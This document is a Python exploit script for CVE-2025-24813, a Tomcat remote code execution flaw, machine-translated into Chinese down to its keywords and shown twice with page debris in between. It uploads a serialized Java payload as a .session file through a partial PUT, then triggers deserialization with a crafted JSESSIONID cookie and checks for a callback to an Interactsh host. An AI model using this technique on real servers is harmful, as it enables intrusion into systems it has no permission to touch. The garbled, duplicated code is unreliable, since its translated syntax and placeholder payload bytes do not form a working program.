#利用title: apache tomcat路径等价- 远程代码执行
#利用作者: Al Baradi Joy
#CVE: CVE-2025-24813
#日期: 2025-04-06
#供应商homepage: https://tomcat.apache.org/
#软件link: https://tomcat.apache.org/download-90.cgi
#版本: Apache Tomcat 11.0.3/10.1.35/9.0.98
#测试在: Apache Tomcat 10.1.33
#cvss: 9.8(关键)
#CWE: CWE-44,CWE-502
#参考:
导入请求
导入随机
导入字符串
导入系统
DEF RAND_FILENAME(长度=6):
返回''.join(random.Choices(string.ascii_lowercase,k=长度))
Def Generate_Payload(Interact_url):
#Java序列化有效载荷小工具触发DNS交互
返回f'\ xac \ xed \ x00 \ x05 .'#替换为实际小工具字节或
发电机
DEF漏洞利用(目标,Interact_url):
文件名=rand_filename()
put_url=f'{target}/{filename} .session'
get_url=f'{target}/{filename}'
标题={
'content-range':'字节0-452/457',
'content-type':'应用程序/八位字节'
}
有效载荷=generate_payload(Interact_url)
print('[+]为CVE-2025-24813'漏洞
打印('[+]由Al Baradi Joy \ n'制作)
打印(f'[+]上传有效载荷到: {put_url}')
r1=requests.put(put_url,data=有效载荷,标头=标头)
如果r1.status_code==201:
打印('[+]有效载荷成功上传。')
其他:
print(f'[ - ]上传失败,status: {r1.status_code}')
返回
打印(f'[+]触发有效负载via: {get_url}')
cookies={'jsessionId': f'。{filename}'}
r2=requests.get(get_url,cookies=cookie)
打印(f'[+]触发请求发送。检查DNS回调为:
{Interact_url}')
如果name=='__ -Main __':
#首先显示横幅
print('[+]为CVE-2025-24813'漏洞
打印('[+]由Al Baradi Joy \ n'制作)
#向用户询问目标域并交互URL
target_url=输入('输入目标域(例如http://localhost:8080):
')
Interact_url=输入('输入您的Interactsh URL:')
exploit(target_url,Interact_url)
#利用作者: Al Baradi Joy
#CVE: CVE-2025-24813
#日期: 2025-04-06
#供应商homepage: https://tomcat.apache.org/
#软件link: https://tomcat.apache.org/download-90.cgi
#版本: Apache Tomcat 11.0.3/10.1.35/9.0.98
#测试在: Apache Tomcat 10.1.33
#cvss: 9.8(关键)
#CWE: CWE-44,CWE-502
#参考:
正在加载...
scrapco.de
导入随机
导入字符串
导入系统
DEF RAND_FILENAME(长度=6):
返回''.join(random.Choices(string.ascii_lowercase,k=长度))
Def Generate_Payload(Interact_url):
#Java序列化有效载荷小工具触发DNS交互
返回f'\ xac \ xed \ x00 \ x05 .'#替换为实际小工具字节或
发电机
DEF漏洞利用(目标,Interact_url):
文件名=rand_filename()
put_url=f'{target}/{filename} .session'
get_url=f'{target}/{filename}'
标题={
'content-range':'字节0-452/457',
'content-type':'应用程序/八位字节'
}
有效载荷=generate_payload(Interact_url)
print('[+]为CVE-2025-24813'漏洞
打印('[+]由Al Baradi Joy \ n'制作)
打印(f'[+]上传有效载荷到: {put_url}')
r1=requests.put(put_url,data=有效载荷,标头=标头)
如果r1.status_code==201:
打印('[+]有效载荷成功上传。')
其他:
print(f'[ - ]上传失败,status: {r1.status_code}')
返回
打印(f'[+]触发有效负载via: {get_url}')
cookies={'jsessionId': f'。{filename}'}
r2=requests.get(get_url,cookies=cookie)
打印(f'[+]触发请求发送。检查DNS回调为:
{Interact_url}')
如果name=='__ -Main __':
#首先显示横幅
print('[+]为CVE-2025-24813'漏洞
打印('[+]由Al Baradi Joy \ n'制作)
#向用户询问目标域并交互URL
target_url=输入('输入目标域(例如http://localhost:8080):
')
Interact_url=输入('输入您的Interactsh URL:')
exploit(target_url,Interact_url)